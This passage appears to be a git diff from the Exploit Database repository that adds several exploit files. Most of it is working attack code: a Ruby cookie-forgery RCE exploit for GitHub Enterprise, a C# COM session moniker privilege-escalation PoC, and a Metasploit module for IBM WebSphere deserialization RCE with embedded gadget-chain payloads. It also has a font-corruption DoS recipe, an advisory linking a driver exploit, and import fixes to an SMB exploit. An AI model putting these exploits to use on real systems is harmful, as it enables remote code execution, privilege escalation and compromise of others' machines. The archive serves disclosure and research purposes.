+puts "(C) 2017 iblue <iblue@exablue.de>"
+
+unless ARGV[0] && ARGV[1]
+  puts "Usage: ./exploit.rb <hostname> <valid ruby code>"
+  puts ""
+  puts "Example: ./exploit.rb ghe.example.org \"%x(id > /tmp/pwned)\""
+  exit 1
+end
+
+hostname = ARGV[0]
+code = ARGV[1]
+
+# First we get the cookie from the host to check if the instance is vulnerable.
+puts "[+] Checking if #{hostname} is vulnerable..."
+
+http = Net::HTTP.new(hostname, 8443)
+http.use_ssl = true
+http.verify_mode = OpenSSL::SSL::VERIFY_NONE # We may deal with self-signed certificates
+
+rqst = Net::HTTP::Get.new("/")
+
+while res = http.request(rqst)
+  case res
+  when Net::HTTPRedirection then
+    puts "  => Following redirect to #{res["location"]}..."
+    rqst = Net::HTTP::Get.new(res["location"])
+  else
+    break
+  end
+end
+
+def not_vulnerable
+  puts "  => Host is not vulnerable"
+  exit 1
+end
+
+unless res['Set-Cookie'] =~ /\A_gh_manage/
+  not_vulnerable
+end
+
+# Parse the cookie
+begin
+  value = res['Set-Cookie'].split("=", 2)[1]
+  data = CGI.unescape(value.split("--").first)
+  hmac = value.split("--").last.split(";", 2).first
+  expected_hmac = OpenSSL::HMAC.hexdigest(OpenSSL::Digest::SHA1.new, SECRET, data)
+  not_vulnerable if expected_hmac != hmac
+rescue
+  not_vulnerable
+end
+
+puts "  => Host is vulnerable"
+
+# Now construct the cookie
+puts "[+] Assembling magic cookie..."
+
+# Stubs, since we don't want to execute the code locally.
+module Erubis;class Eruby;end;end
+module ActiveSupport;module Deprecation;class DeprecatedInstanceVariableProxy;end;end;end
+
+erubis = Erubis::Eruby.allocate
+erubis.instance_variable_set :@src, "#{code}; 1"
+proxy = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.allocate
+proxy.instance_variable_set :@instance, erubis
+proxy.instance_variable_set :@method, :result
+proxy.instance_variable_set :@var, "@result"
+
+session = {"session_id" => "", "exploit" => proxy}
+
+# Marshal session
+dump = [Marshal.dump(session)].pack("m")
+hmac = OpenSSL::HMAC.hexdigest(OpenSSL::Digest::SHA1.new, SECRET, dump)
+
+puts "[+] Sending cookie..."
+
+rqst = Net::HTTP::Get.new("/")
+rqst['Cookie'] = "_gh_manage=#{CGI.escape("#{dump}--#{hmac}")}"
+
+res = http.request(rqst)
+
+if res.code == "302"
+  puts "  => Code executed."
+else
+  puts "  => Something went wrong."
+end

platforms/windows/dos/41615.txt

@@ -0,0 +1,32 @@
+# Date: 15-03-2017
+# Author: Hossein Lotfi (https://twitter.com/hosselot)
+# CVE: CVE-2016-7274
+
+1. Description
+
+An integer overflow error within the "LoadUvsTable()" function of usp10.dll
+can be exploited to cause a heap-based buffer overflow. Full analysis is
+available at:
+
+http://blogs.flexerasoftware.com/secunia-research/2016/12/microsoft_windows_loaduvstable_heap_based_buffer_overflow_vulnerability.html
+
+
+2. Proof of Concept
+
+open “C:\Windows\Fonts\phagspa.ttf” in a hex editor and change the value at
+offset 0x2051 from 0x00000006 to 0x33333334.
+
+
+3. Solution:
+
+Microsoft initially tried to fixed the issue in MS16-147, but the fix was
+incomplete and the issue remained unpatched til Microsoft March 2017 patch
+release:
+
+https://twitter.com/hosselot/status/809059287037251584
+
+It appears MS17-013 finally fixed the vulnerability properly:
+
+https://technet.microsoft.com/en-us/library/security/ms17-013.aspx
+
+@hosselot

platforms/windows/local/41605.txt

@@ -0,0 +1,20 @@
+#Exploit Title: PCAUSA Rawether for Windows local privilege escalation
+#Date: 2017-03-15
+#Exploit Author: ReWolf
+#Vendor Homepage: original vendor website doesn't exist anymore
+#Version: too many
+#Tested on: Windows 10 x64 (TH2, RS1)
+
+Rawether for Windows is a framework that facilitates communication between an application and the NDIS miniport driver. It’s produced by a company named Printing Communications Assoc., Inc. (PCAUSA), which seems to be no longer operating. Company websites can be still reached through web.archive.org:
+
+http://web.archive.org/web/20151017034756/http://www.pcausa.com/
+http://web.archive.org/web/20151128171809/http://www.rawether.net/
+
+Rawether framework provides NDIS Protocol Driver similar to the NPF.SYS (part of the WinPcap). This framework is used by many different hardware vendors in their WiFi and router control applications. Exploit attached to this advisory targets 64bit version of PcaSp60.sys driver which is part of ASUS PCE-AC56 WLAN Card Utilities.
+
+More information:
+- http://blog.rewolf.pl/blog/?p=1778
+- https://github.com/rwfpl/rewolf-pcausa-exploit/tree/4045cd9b45d647430d779f5b0a018a7a11d6ca2a
+
+PoC:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41605.zip

platforms/windows/local/41607.cs

@@ -0,0 +1,157 @@
+/*
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1021
+
+Windows: COM Session Moniker EoP
+Platform: Tested on Windows 10 14393, Server 2012 R2
+Class: Elevation of Privilege
+
+Summary:
+When activating an object using the session moniker the DCOM activator doesn’t check if the current user has permission allowing a user to start an arbitrary process in another logged on user’s session.
+
+Description:
+
+The COM session moniker allows a user to specify the interactive session that’s to be used when a DCOM object is registered with an AppID with RunAs of “Interactive User”. As switching sessions is not something a normal user can do you’d assume that this would be only accessible to administrators (or at least with Impersonate/Assign Primary Token privilege). It turns out however that there’s no such restriction, this allows one user to instantiate a DCOM object inside another user’s session on the same machine (think Terminal Server or Fast User Switching).
+
+The only restriction on the user then accessing that instantiated server is the specified Access DACL. The default Access DACL on a modern system only allows the user identity the server is running as as well as Administrators to access the created object. However there are a number of statically registered servers which allow the interactive user group (and who knows how many dynamically allowed ones through CoInitializeSecurity). I already described one these in my blog post of resurrecting dead processes, HxHelpPaneServer. With this object we can execute an arbitrary process in the context of the other user in their session.
+
+Fortunately at least it's not possible to create an object in Session 0 (as far as I can tell) as that's not an interactive session.
+
+Proof of Concept:
+
+I’ve attached a proof of concept in C#. To test PoC use the following steps.
+
+1) Create two users on the same machine.
+2) Log on to both users to ensure account setup has completed. 
+3) As one of the users execute the PoC, ensure it prints that it’s going to start a new process. Switch to the other user (without logging out the one running the PoC).
+4) After about 20 seconds a copy of notepad should start on the other user’s desktop. Of course this could be any process including an arbitrary executable from the other user.
+
+NOTE: Make sure these user’s are not administrators, or at least are split token administrators. If they’re the Administrator user which doesn’t run by default with a filtered token then the user will not be able to access the DCOM object due to High IL and executing the process will fail. That’s not to say it’s impossible to exploit that scenario, just more difficult.
+
+Expected Result:
+Using a session moniker for a session outside the current one should fail if not an administrator.
+
+Actual Result:
+DCOM object created in the specified session an arbitrary executable run as that user.
+*/
+
+using System;
+using System.Collections.Generic;
+using System.Diagnostics;
+using System.IO;
+using System.Linq;
+using System.Runtime.InteropServices;
+using System.Threading;
+
+namespace PoC_SessionMoniker_EoP
+{
+    class Program
+    {
+        [ComImport, Guid("8cec592c-07a1-11d9-b15e-000d56bfe6ee"), InterfaceType(ComInterfaceType.InterfaceIsIUnknown)]
+        interface IHxHelpPaneServer
+        {
+            void DisplayTask(string task);
+            void DisplayContents(string contents);
+            void DisplaySearchResults(string search);
+            void Execute([MarshalAs(UnmanagedType.LPWStr)] string file);
+        }
+
+        enum WTS_CONNECTSTATE_CLASS
+        {
+            WTSActive,              // User logged on to WinStation
+            WTSConnected,           // WinStation connected to client
+            WTSConnectQuery,        // In the process of connecting to client
+            WTSShadow,              // Shadowing another WinStation
+            WTSDisconnected,        // WinStation logged on without client
+            WTSIdle,                // Waiting for client to connect
+            WTSListen,              // WinStation is listening for connection
+            WTSReset,               // WinStation is being reset
+            WTSDown,                // WinStation is down due to error
+            WTSInit,                // WinStation in initialization
+        }
+
+        [StructLayout(LayoutKind.Sequential)]
+        struct WTS_SESSION_INFO
+        {
+            public int SessionId;
+            public IntPtr pWinStationName;
+            public WTS_CONNECTSTATE_CLASS State;
+        }
+
+        [DllImport("wtsapi32.dll", SetLastError = true)]
+        static extern bool WTSEnumerateSessions(
+                IntPtr hServer,
+                int Reserved,
+                int Version,
+                out IntPtr ppSessionInfo,
+                out int pCount);
+
+        [DllImport("wtsapi32.dll", SetLastError = true)]
+        static extern void WTSFreeMemory(IntPtr memory);
+
+        public static IEnumerable<int> GetSessionIds()
+        {
+            List<int> sids = new List<int>();
+            IntPtr pSessions = IntPtr.Zero;
+            int dwSessionCount = 0;
+            try
+            {
+                if (WTSEnumerateSessions(IntPtr.Zero, 0, 1, out pSessions, out dwSessionCount))
+                {
+                    IntPtr current = pSessions;
+                    for (int i = 0; i < dwSessionCount; ++i)
+                    {
+                        WTS_SESSION_INFO session_info = (WTS_SESSION_INFO)Marshal.PtrToStructure(current, typeof(WTS_SESSION_INFO));
+                        
+                        if (session_info.State == WTS_CONNECTSTATE_CLASS.WTSActive)
+                        {
+                            if (session_info.SessionId != 0)
+                            {
+                                sids.Add(session_info.SessionId);
+                            }
+                        }
+                        current += Marshal.SizeOf(typeof(WTS_SESSION_INFO));
+                    }
+                }
+            }
+            finally
+            {
+                if (pSessions != IntPtr.Zero)
+                {
+                    WTSFreeMemory(pSessions);
+                }
+            }
+
+            return sids;
+        }
+
+        static void Main(string[] args)
+        {
+            try
+            {
+                int current_session_id = Process.GetCurrentProcess().SessionId;
+                int new_session_id = 0;
+                Console.WriteLine("Waiting For a Target Session");
+                while (true)
+                {
+                    IEnumerable<int> sessions = GetSessionIds().Where(id => id != current_session_id);
+                    if (sessions.Count() > 0)
+                    {
+                        new_session_id = sessions.First();
+                        break;
+                    }
+                    Thread.Sleep(1000);
+                }
+                
+                Console.WriteLine("Creating Process in Session {0} after 20secs", new_session_id);
+                Thread.Sleep(20000);
+                IHxHelpPaneServer server = (IHxHelpPaneServer)Marshal.BindToMoniker(String.Format("session:{0}!new:8cec58ae-07a1-11d9-b15e-000d56bfe6ee", new_session_id));
+                Uri target = new Uri(Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.System), "notepad.exe"));
+                server.Execute(target.AbsoluteUri);
+            }
+            catch (Exception ex)
+            {
+                Console.WriteLine(ex);
+            }
+        }
+    }
+}

platforms/windows/remote/41613.rb

@@ -0,0 +1,119 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Powershell
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "IBM WebSphere RCE Java Deserialization Vulnerability",
+      'Description'    => %q{
+        This module exploits a vulnerability in IBM's WebSphere Application Server. An unsafe deserialization
+        call of unauthenticated Java objects exists to the Apache Commons Collections (ACC) library, which allows
+        remote arbitrary code execution. Authentication is not required in order to exploit this vulnerability.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+            'Liatsis Fotios @liatsisfotios'       # Metasploit Module
+
+            # Thanks for helping me:
+            # # # # # # # # # # # #
+
+            # Kyprianos Vasilopoulos @kavasilo    # Implemented and reviewed - Metasploit module
+            # Dimitriadis Alexios @AlxDm_         # Assistance and code check
+            # Kotsiopoulos Panagiotis             # Guidance about Size and Buffer implementation
+        ],
+      'References'     =>
+        [
+            ['CVE', '2015-7450'],
+            ['URL', 'https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/CommonsCollections1.java'],
+            ['URL', 'http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability'],
+            ['URL', 'https://www.tenable.com/plugins/index.php?view=single&id=87171']
+        ],
+      'Platform'       => 'win',
+      'Targets'        =>
+        [
+            [ 'IBM WebSphere 7.0.0.0', {} ]
+        ],
+      'DisclosureDate' => "Nov 6 2015",
+      'DefaultTarget'  => 0,
+      'DefaultOptions' => {
+            'SSL'      => true,
+            'WfsDelay' => 20
+      }))
+
+    register_options([
+      OptString.new('TARGETURI', [true, 'The base IBM\'s WebSphere SOAP path', '/']),
+      Opt::RPORT('8880')
+    ], self.class)
+  end
+
+
+  def exploit
+      # Decode - Generate - Set Payload / Send SOAP Request
+      soap_request(set_payload)
+  end
+
+  def set_payload
+      # CommonCollections1 Serialized Streams
+      ccs_start = "rO0ABXNyADJzdW4ucmVmbGVjdC5hbm5vdGF0aW9uLkFubm90YXRpb25JbnZvY2F0aW9uSGFuZGxlclXK9Q8Vy36lAgACTAAMbWVtYmVyVmFsdWVzdAAPTGphdmEvdXRpbC9NYXA7TAAEdHlwZXQAEUxqYXZhL2xhbmcvQ2xhc3M7eHBzfQAAAAEADWphdmEudXRpbC5NYXB4cgAXamF2YS5sYW5nLnJlZmxlY3QuUHJveHnhJ9ogzBBDywIAAUwAAWh0ACVMamF2YS9sYW5nL3JlZmxlY3QvSW52b2NhdGlvbkhhbmRsZXI7eHBzcQB+AABzcgAqb3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLm1hcC5MYXp5TWFwbuWUgp55EJQDAAFMAAdmYWN0b3J5dAAsTG9yZy9hcGFjaGUvY29tbW9ucy9jb2xsZWN0aW9ucy9UcmFuc2Zvcm1lcjt4cHNyADpvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMuZnVuY3RvcnMuQ2hhaW5lZFRyYW5zZm9ybWVyMMeX7Ch6lwQCAAFbAA1pVHJhbnNmb3JtZXJzdAAtW0xvcmcvYXBhY2hlL2NvbW1vbnMvY29sbGVjdGlvbnMvVHJhbnNmb3JtZXI7eHB1cgAtW0xvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMuVHJhbnNmb3JtZXI7vVYq8dg0GJkCAAB4cAAAAAVzcgA7b3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLmZ1bmN0b3JzLkNvbnN0YW50VHJhbnNmb3JtZXJYdpARQQKxlAIAAUwACWlDb25zdGFudHQAEkxqYXZhL2xhbmcvT2JqZWN0O3hwdnIAEWphdmEubGFuZy5SdW50aW1lAAAAAAAAAAAAAAB4cHNyADpvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMuZnVuY3RvcnMuSW52b2tlclRyYW5zZm9ybWVyh+j/a3t8zjgCAANbAAVpQXJnc3QAE1tMamF2YS9sYW5nL09iamVjdDtMAAtpTWV0aG9kTmFtZXQAEkxqYXZhL2xhbmcvU3RyaW5nO1sAC2lQYXJhbVR5cGVzdAASW0xqYXZhL2xhbmcvQ2xhc3M7eHB1cgATW0xqYXZhLmxhbmcuT2JqZWN0O5DOWJ8QcylsAgAAeHAAAAACdAAKZ2V0UnVudGltZXVyABJbTGphdmEubGFuZy5DbGFzczurFteuy81amQIAAHhwAAAAAHQACWdldE1ldGhvZHVxAH4AHgAAAAJ2cgAQamF2YS5sYW5nLlN0cmluZ6DwpDh6O7NCAgAAeHB2cQB+AB5zcQB+ABZ1cQB+ABsAAAACcHVxAH4AGwAAAAB0AAZpbnZva2V1cQB+AB4AAAACdnIAEGphdmEubGFuZy5PYmplY3QAAAAAAAAAAAAAAHhwdnEAfgAbc3EAfgAWdXIAE1tMamF2YS5sYW5nLlN0cmluZzut0lbn6R17RwIAAHhwAAAAAXQ="
+      ccs_end = "dAAEZXhlY3VxAH4AHgAAAAFxAH4AI3NxAH4AEXNyABFqYXZhLmxhbmcuSW50ZWdlchLioKT3gYc4AgABSQAFdmFsdWV4cgAQamF2YS5sYW5nLk51bWJlcoaslR0LlOCLAgAAeHAAAAABc3IAEWphdmEudXRpbC5IYXNoTWFwBQfawcMWYNEDAAJGAApsb2FkRmFjdG9ySQAJdGhyZXNob2xkeHA/QAAAAAAAEHcIAAAAEAAAAAB4eHZyABJqYXZhLmxhbmcuT3ZlcnJpZGUAAAAAAAAAAAAAAHhwcQB+ADo="
+
+      # Generate Payload
+      payload_exec = invoke_ccs(ccs_start) + gen_payload + invoke_ccs(ccs_end)
+      payload_exec = Rex::Text.encode_base64(payload_exec)
+  end
+
+  def invoke_ccs(serialized_stream)
+      # Decode Serialized Streams
+      serialized_stream = Rex::Text.decode_base64(serialized_stream)
+  end
+
+  def gen_payload
+      # Staging Native Payload
+      exec_cmd = cmd_psh_payload(payload.encoded, payload_instance.arch.first)
+      exec_cmd = exec_cmd.gsub("%COMSPEC% /b /c start /b /min ", "")
+
+      # Size up RCE - Buffer
+      cmd_lng = exec_cmd.length
+      lng2str = "0" + cmd_lng.to_s(16)
+      buff = [lng2str].pack("H*")
+
+      rce_pld = buff + exec_cmd
+  end
+
+  def soap_request(inject_payload)
+      # SOAP Request
+      req = "<?xml version='1.0' encoding='UTF-8'?>" + "\r\n"
+      req += "<SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\">" + "\r\n"
+      req += "<SOAP-ENV:Header xmlns:ns0=\"admin\" ns0:WASRemoteRuntimeVersion=\"7.0.0.0\" ns0:JMXMessageVersion=\"1.0.0\" ns0:SecurityEnabled=\"true\" ns0:JMXVersion=\"1.2.0\">" + "\r\n"
+      req += "<LoginMethod>BasicAuth</LoginMethod>" + "\r\n"
+      req += "</SOAP-ENV:Header>" + "\r\n"
+      req += "<SOAP-ENV:Body>" + "\r\n"
+      req += "<ns1:getAttribute xmlns:ns1=\"urn:AdminService\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">" + "\r\n"
+      req += "<objectname xsi:type=\"ns1:javax.management.ObjectName\">" + inject_payload + "</objectname>" + "\r\n"
+      req += "<attribute xsi:type=\"xsd:string\">ringBufferSize</attribute>" + "\r\n"
+      req += "</ns1:getAttribute>" + "\r\n"
+      req += "</SOAP-ENV:Body>" + "\r\n"
+      req += "</SOAP-ENV:Envelope>" + "\r\n"
+
+      uri = target_uri.path
+
+      res = send_request_raw({
+          'method'      => 'POST',
+          'version'     => '1.1',
+          'raw_headers' => "Content-Type: text/xml; charset=utf-8" + "\r\n" + "SOAPAction: \"urn:AdminService\"" + "\r\n",
+          'uri'         => normalize_uri(uri),
+          'data'        => req
+      })
+  end
+
+end

platforms/windows/remote/7132.py

@@ -4,6 +4,8 @@
 #   www.hackingspirits.com
 #   www.coffeeandsecurity.com
 #   Email: d3basis.m0hanty @ gmail.com
+#
+# E-DB Note: Exploit Update ~ https://github.com/offensive-security/exploit-database/pull/77/files#diff-5247d21ae6747fa8543ef0ba9c06c0e2
 #############################################################################
 
 import struct
@@ -15,8 +17,8 @@ from threading import Thread    #Thread is imported incase you would like to mod
 try:
     from impacket import smb
     from impacket import uuid
-    from impacket.dcerpc import dcerpc
+    from impacket import dcerpc
-    from impacket.dcerpc import transport
+    from impacket.dcerpc.v5 import transport
 except ImportError, _:
     print 'Install the following library to make this script work'
     print 'Impacket : http://oss.coresecurity.com/projects/impacket.html'